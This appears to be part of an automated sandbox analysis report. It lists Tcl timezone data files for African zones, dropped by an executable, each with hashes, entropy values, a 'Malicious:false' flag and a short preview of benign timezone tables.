                                                                                                                                                                                                                              SHA-512:0174D3C6F9116C36C62AD1EB58203EE7DFE8C37F618B8449D5E45AD6290CF8334F28798877D7A563A12EE533026244D6A49BCCF29B5D7FCB5BCC91481D0DDDE2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lusaka) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.857096806490649
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcn2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D42D4yn
                                                                                                                                                                                                                              MD5:1CA9B3E7BCD5BC1CC881453D16B09389
                                                                                                                                                                                                                              SHA1:1B1964B314E72847D71A42C147CF2BF331B44461
                                                                                                                                                                                                                              SHA-256:35D56EFFE9E7E60F17B32BD30486E566B635F0AE7A8948D77395B8E6332E26F1
                                                                                                                                                                                                                              SHA-512:9E08D57B7824F5B076D159D9A5106E51450DF24729C36F485B9B68E8F47E8DFC50F9BEC3F11E0AE6579A8E372A5C0F0DA18A2E797CF2115519D1B4E5B64413DD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Malabo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                              Entropy (8bit):4.952872531197478
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2DcfKiMXGm2OHoVoHvdSF2I:SlSWB9eg/2DEZDm2OHoVoHvdI
                                                                                                                                                                                                                              MD5:CD429B6891CBF603A93F9A9733E2391B
                                                                                                                                                                                                                              SHA1:C6833B83B6D1694AC632018A27915E6F97F708AE
                                                                                                                                                                                                                              SHA-256:FE6B6A4BE1B61F7F909A3F6137530DFE6D1754499A4D9B0D1CE4952FFF0AE62D
                                                                                                                                                                                                                              SHA-512:6E57B70B71515998AD617954F9DDAE19968B20946542201153DAB47FBE63790D42F41AE29148ECBCE6D12812879BCF0A4EC881507B62CDB2675AB20267220BF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Maputo) {.. {-9223372036854775808 7820 0 LMT}.. {-2109291020 7200 0 CAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.964472328419063
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DZQs+DWb4n:MByMaHw7NH/t2DZiDWU
                                                                                                                                                                                                                              MD5:88C8FF2B480648EDADBD0FB93F754275
                                                                                                                                                                                                                              SHA1:BED7A784C378909914CEB0D303DFE6D05FD576B7
                                                                                                                                                                                                                              SHA-256:1D80FD86CB733D57D88ECD404E702F750B233ED0CCBFBFFFEED1AAD3B7F1CB04
                                                                                                                                                                                                                              SHA-512:CB7F831CF099E85B948AE57FCE9D91C7EAAD39753AF82C56EC15B65830EB4115A71BBC83A71A2AC947CAB24DEDDB557E02FAA5A3264546AE6E60607DF6BD2FA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Maseru) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):200
                                                                                                                                                                                                                              Entropy (8bit):4.957246428185456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DzjEHp4DWb4n:MByMaHw7NH/t2DzjEJ4DWU
                                                                                                                                                                                                                              MD5:CA7255B86425BA706D214924856B6818
                                                                                                                                                                                                                              SHA1:E9BE6CF871BB1786E842953D41392299952EC9AC
                                                                                                                                                                                                                              SHA-256:547197C09C1987350AE5720A4EEC7E8D8F4B9F4A0559726E225E13C707F7C564
                                                                                                                                                                                                                              SHA-512:23F9AD0F926A0945A17BBC3DCFF9A3D7EE68EC9423EA78985F5FFC60CC61641B57871F9AA703B5FB9BE842DCD4693D0641F9EDED702240873F58D24CD4D60C32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Mbabane) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.877126792757121
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcBEBXCEeDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DFSVDR
                                                                                                                                                                                                                              MD5:5C2E2B5189E0E816D5BD7AFC8B49A35E
                                                                                                                                                                                                                              SHA1:4E43A1ED51399528636D6442B1DDFFD820911407
                                                                                                                                                                                                                              SHA-256:25E221BE49DEC5547A74AEB91B0041859C59BC866987272A447AB2343D1CC30C
                                                                                                                                                                                                                              SHA-512:B74735CFAB692756BAADFB1A51A8CC0C986F981D8E7E7A8182370A9017E67439875F0115820A349AFB3BE2FA581A721440968EF817471DD2C5E1286E53B2FE99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Mogadishu) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.8660011420394955
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2D3NPDm2OHrFGxYoHvlHIg5pTwdPsy:MB862D3NbmdHhmYCvdIg5GPsy
                                                                                                                                                                                                                              MD5:1B3C94B5098E454981C73C1F2AF80164
                                                                                                                                                                                                                              SHA1:1EBA9E2DBEA70BB1AE5EB13739518AB5A62D2130
                                                                                                                                                                                                                              SHA-256:2BF0D90610211651127402680519B29AB50B15D344263D0C1A22EDEBE5E01E27
                                                                                                                                                                                                                              SHA-512:DA4A0BCE7C6750BD7D3BA76B6301B9390723BE0C001C39BE453D80BD87020C2253A75629F68F83C19410D2A75FAF5223A435299CD4AA53DE545EC7C5B5AA54B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Monrovia) {.. {-9223372036854775808 -2588 0 LMT}.. {-2776979812 -2588 0 MMT}.. {-1604359012 -2670 0 MMT}.. {63593070 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):277
                                                                                                                                                                                                                              Entropy (8bit):4.655052651600954
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2Dk1Dm2OHsvT5oH99VCV22ufPnVCkVBKBQn9q:MB862DGmdHsvVCjkifvdH9q
                                                                                                                                                                                                                              MD5:B640661FB37BB74FAB172DBDF1B433E1
                                                                                                                                                                                                                              SHA1:0236A5B53443A4A18B8B9D6AA7732620BE9A6553
                                                                                                                                                                                                                              SHA-256:BD8E9765174431C0D403249D3E881C949C83966E9F8162552DA88AE53132467B
                                                                                                                                                                                                                              SHA-512:53DCC6DF7C3E0B00A6D98A8DCC4988C8CFD6B53CC89E6F8D32DA41CB532A62D9C6A823675C5039F5639CE0D423F6D571F46F5B93FFC7EFFB4EDFFBF89D46AA12
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Nairobi) {.. {-9223372036854775808 8836 0 LMT}.. {-1946168836 9000 0 +0230}.. {-1309746600 10800 0 EAT}.. {-1261969200 9000 0 +0230}.. {-1041388200 9900 0 +0245}.. {-865305900 10800 0 EAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.856754881865487
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DjUfDm2OHNseoH1axCXFHzaSmkFWTvF9:MB862DjULmdHPC1XNzaS3yz
                                                                                                                                                                                                                              MD5:EDB548348E590C8CFE04ED172D96B86C
                                                                                                                                                                                                                              SHA1:AD3B631FB03819772164402E202AFA781687F597
                                                                                                                                                                                                                              SHA-256:9ADA5F5AFB25E823E1F0E8AD2489AAA1C09F01356634A9403670D7AB21CA2E2C
                                                                                                                                                                                                                              SHA-512:17E396A9BE497077B774AD1108CC8760ED35FC92F65FFF070F9ACD3C4FB67A335C1C57DF1CCB1570DE14B708EFCA0063990A969E30759C9A47731DA45ED25EFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ndjamena) {.. {-9223372036854775808 3612 0 LMT}.. {-1830387612 3600 0 WAT}.. {308703600 7200 1 WAST}.. {321314400 3600 0 WAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.871519187180041
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcdhA9Ff2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dsh2f2D1
                                                                                                                                                                                                                              MD5:0134039CD1666E983A9B6E43ABD6AF59
                                                                                                                                                                                                                              SHA1:A2A99345390F4D17C892CEADE58C604257686764
                                                                                                                                                                                                                              SHA-256:B517120AD8DB3F21EAB4E44A78001EE856EB4EA35852C54CCA96D38887DEBCFA
                                                                                                                                                                                                                              SHA-512:E5911ADD3D776D87ACFC986C4D2564E3ED9AB12C67F23391ED35FF2A31AD8314B873E31DB8DA4D5E0DAEA12BE34110A8F0C27C9C6126977BAD51C6AD5CDFA39B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Niamey) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.909962899502589
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcboGb+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dqbb+c
                                                                                                                                                                                                                              MD5:550E482599C2F4280F2C258019BB2547
                                                                                                                                                                                                                              SHA1:A39045BEF313094CEDC100A7D695AE51BC9E498D
                                                                                                                                                                                                                              SHA-256:64CAF2BF9D45095DF97F419714D5617CF6300ACDB544B621DCE1D594AA9B910C
                                                                                                                                                                                                                              SHA-512:4FD29C5B4C0D2BDE69C437E9BF4F08A11E1DAAA689B69F28F3551F550BDCCDD055E4C1A241EDB2FA48B18825AFF792F4860F55983E106EA8224F1D87ED4F7546
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Nouakchott) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.920023025906233
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXCZDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2D1DBS
                                                                                                                                                                                                                              MD5:6CFC4E938E50C9B591F8CC42A14FA82A
                                                                                                                                                                                                                              SHA1:FCE14A5CA62C9005C76D27B849A238E76C834F8A
                                                                                                                                                                                                                              SHA-256:03B9C1FE350B5E9F6F333F9519FA394DCC562308D9388A903AF3D3FECEBDC762
                                                                                                                                                                                                                              SHA-512:98F22F1D23A9930276A2D306A1473E64DC43547A16CFD01226E4F030A26A3CC4FDED77F790583CC5C078FC6DFCCE81C16A50879AE46A0D3A6F1FA98373F413C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Ouagadougou) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.893842293207225
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcyTKM0DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DQD4yn
                                                                                                                                                                                                                              MD5:6D979FCD225D5431C7391AE568C6409F
                                                                                                                                                                                                                              SHA1:6C9DCD222061CC00FD386773C6BB2861F3429A60
                                                                                                                                                                                                                              SHA-256:8FB8692DB9281AE2B087D704168BFD47D3D0901781FEF65BFD62FCB213BA6B50
                                                                                                                                                                                                                              SHA-512:32AFA6AF6BFC3D42CA636DD2B96906048EF1ADFBB135BB7E7B77C444FED99FDABB84FBBADF56EC63828FFA7B3371191FF1311822B1C75241EBD9CF602467088E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Porto-Novo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):234
                                                                                                                                                                                                                              Entropy (8bit):4.818597723513168
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DXDm2OHH5oHvzdoH1aNbbFHRMy:MB862DTmdHH5CvzdC16bZRMy
                                                                                                                                                                                                                              MD5:28A5967C797F4B38FB63F823D6F07168
                                                                                                                                                                                                                              SHA1:17872E91683B884191D2E4C777FB79DCE6D73EE7
                                                                                                                                                                                                                              SHA-256:BA1D60DF2B41320F92A123A714E17E576C89383526B96E0541A464C3FBA415B7
                                                                                                                                                                                                                              SHA-512:B335E3D3268631F3A71F4BAD59740F3A5222344E8223C201B8FE885BAA7F1A550FA7778E498D6DC2111F41053856F50B21413AECCE84B80833EC8176F2A1009C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Sao_Tome) {.. {-9223372036854775808 1616 0 LMT}.. {-2713912016 -2205 0 LMT}.. {-1830384000 0 0 GMT}.. {1514768400 3600 0 WAT}.. {1546304400 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.905303708777235
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcHdDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwdDBS
                                                                                                                                                                                                                              MD5:F2D7F7BC4EA3629EC7F0E45300A0CFD2
                                                                                                                                                                                                                              SHA1:E7594D378C5DCFEB1E87E13AC79A026260D2E630
                                                                                                                                                                                                                              SHA-256:9D8009ACAB019B32B1E87AB10E0AC3765ABCABE8066318DA8CA4905D41562F72
                                                                                                                                                                                                                              SHA-512:795E58172907020C85CF0B10BBA35842D5F92872CCB3382DFDC787BAA504C79927FA23BC3104AD63541A95C44CA80977E8247846DE918A0B00963B970F4823D2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Timbuktu) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):954
                                                                                                                                                                                                                              Entropy (8bit):4.151253074491018
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862DrmdHrCDWR+f7Zn9ueRSmNvlTtuyI/ZBv8dq8Jw4VFZBZYEuAENSfp8kSYx:5veuDkWx3NdT18kbjjAkxTx
                                                                                                                                                                                                                              MD5:2DF9B050D82B06EB89DA908C31C1F1C9
                                                                                                                                                                                                                              SHA1:CB294E12560A98D5CEA3BA7004B5519B6C22BAAC
                                                                                                                                                                                                                              SHA-256:B447B6B1C351E77F22A2D77C0437F2BBB7D8BDFDFDC3D6285E0D260519CC7110
                                                                                                                                                                                                                              SHA-512:BBE281D551E9F8DA7B6BB08D809177615410A11E4B1184ABD220EA8B1F355B2BBC090C6BAAF7E07FD61286891388ECD4026D4433C4E4B6A8D201F8D95E174532
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tripoli) {.. {-9223372036854775808 3164 0 LMT}.. {-1577926364 3600 0 CET}.. {-574902000 7200 1 CEST}.. {-512175600 7200 1 CEST}.. {-449888400 7200 1 CEST}.. {-347158800 7200 0 EET}.. {378684000 3600 0 CET}.. {386463600 7200 1 CEST}.. {402271200 3600 0 CET}.. {417999600 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {465429600 3600 0 CET}.. {481590000 7200 1 CEST}.. {496965600 3600 0 CET}.. {512953200 7200 1 CEST}.. {528674400 3600 0 CET}.. {544230000 7200 1 CEST}.. {560037600 3600 0 CET}.. {575852400 7200 1 CEST}.. {591660000 3600 0 CET}.. {607388400 7200 1 CEST}.. {623196000 3600 0 CET}.. {641775600 7200 0 EET}.. {844034400 3600 0 CET}.. {860108400 7200 1 CEST}.. {875919600 7200 0 EET}.. {1352505600 3600 0 CET}.. {1364515200 7200 1 CEST}.. {1382662800 7200 0 EET}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):4.150944563639585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862DHmdHjCvbB/lxRjntMVyoKCyFWeey0XSe/OSyHaCgmvLOcSFQSFeSTC6ZPJ:5LemvbplxRhbv+yuh2tIee6kvcw9Cy
                                                                                                                                                                                                                              MD5:0C99335A41D33AA8BC1EDA0CB4CDCBF5
                                                                                                                                                                                                                              SHA1:5CABC28D318FA5B8307429EA571FFF91EB8E1252
                                                                                                                                                                                                                              SHA-256:0760D1028E733888E43E7F1E057217DC2B52786029FCEC67B27EB69CC6A54938
                                                                                                                                                                                                                              SHA-512:C8FE685ACA46FD4836F3AABC15833F294E5EBED123A487D04E74A8C5668BDFAFB96D2326760452A6E5A1B9CC25AC6C3918D8C10A7F8EF737456640E3000BBA2F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tunis) {.. {-9223372036854775808 2444 0 LMT}.. {-2797202444 561 0 PMT}.. {-1855958961 3600 0 CET}.. {-969242400 7200 1 CEST}.. {-950493600 3600 0 CET}.. {-941940000 7200 1 CEST}.. {-891136800 3600 0 CET}.. {-877827600 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-842918400 3600 0 CET}.. {-842223600 7200 1 CEST}.. {-828230400 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796269600 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766634400 3600 0 CET}.. {231202800 7200 1 CEST}.. {243903600 3600 0 CET}.. {262825200 7200 1 CEST}.. {276044400 3600 0 CET}.. {581122800 7200 1 CEST}.. {591145200 3600 0 CET}.. {606870000 7200 1 CEST}.. {622594800 3600 0 CET}.. {641516400 7200 1 CEST}.. {654649200 3600 0 CET}.. {1114902000 7200 1 CEST}.. {1128038400 3600 0 CET}.. {1143334800 7200 1 CEST}.. {1162083600 3600 0 CET}.. {11747
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1649
                                                                                                                                                                                                                              Entropy (8bit):3.9974091170263066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5t+Lmcz0iMHHWMbnHoMcHiM0H+MCySHr/MDHqMafHO8MwHJMHHOMHSHWMHHXM5Hs:OLjQDI6jZ2WFcv
                                                                                                                                                                                                                              MD5:4846FB13467BA93EB134D88228D7F534
                                                                                                                                                                                                                              SHA1:477FC6144B7DF365606A2E44EF1430F8DF6FB841
                                                                                                                                                                                                                              SHA-256:DFC3D1FC182B315B31D999BC103C264BD205EB16F971C8636003A71170D7BD7C
                                                                                                                                                                                                                              SHA-512:A719F5083F66CE44FE047880A10B2ED04B66E01C7F0F7DADAE2FFB95172308F091D669BCFED5A236D2A0F80A4A1D78DA7A778DDE3FAECB40170ECDA705573769
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Windhoek) {.. {-9223372036854775808 4104 0 LMT}.. {-2458170504 5400 0 +0130}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {637970400 7200 0 CAT}.. {764200800 3600 1 WAT}.. {778640400 7200 0 CAT}.. {796780800 3600 1 WAT}.. {810090000 7200 0 CAT}.. {828835200 3600 1 WAT}.. {841539600 7200 0 CAT}.. {860284800 3600 1 WAT}.. {873594000 7200 0 CAT}.. {891734400 3600 1 WAT}.. {905043600 7200 0 CAT}.. {923184000 3600 1 WAT}.. {936493200 7200 0 CAT}.. {954633600 3600 1 WAT}.. {967942800 7200 0 CAT}.. {986083200 3600 1 WAT}.. {999392400 7200 0 CAT}.. {1018137600 3600 1 WAT}.. {1030842000 7200 0 CAT}.. {1049587200 3600 1 WAT}.. {1062896400 7200 0 CAT}.. {1081036800 3600 1 WAT}.. {1094346000 7200 0 CAT}.. {1112486400 3600 1 WAT}.. {1125795600 7200 0 CAT}.. {1143936000 3600 1 WAT}.. {1157245200 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8447
                                                                                                                                                                                                                              Entropy (8bit):3.867931581740766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:6hvOs5vveFaHU6lgqN/zNMkixlrxYTMcmo1LWF59:6hvOstgqN/zNMkArxiZmf
                                                                                                                                                                                                                              MD5:DF52E726B33FA47EB115C1233614E101
                                                                                                                                                                                                                              SHA1:26B0E49022FCB929F0160617F9C9D2DBEDC63610
                                                                                                                                                                                                                              SHA-256:77231D179260C08690A70AEE6C2517E4B621ED4794D9AEEA7040539F4FF05111
                                                                                                                                                                                                                              SHA-512:48AAF25419E07B06E076B0E19F9A0C27EB257556E62FD8F7B2AA963A817823DD89D33AB6AFEAAC2EF2230361D76776355E19CC2BBBB4D19536F823A347AC8AA4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
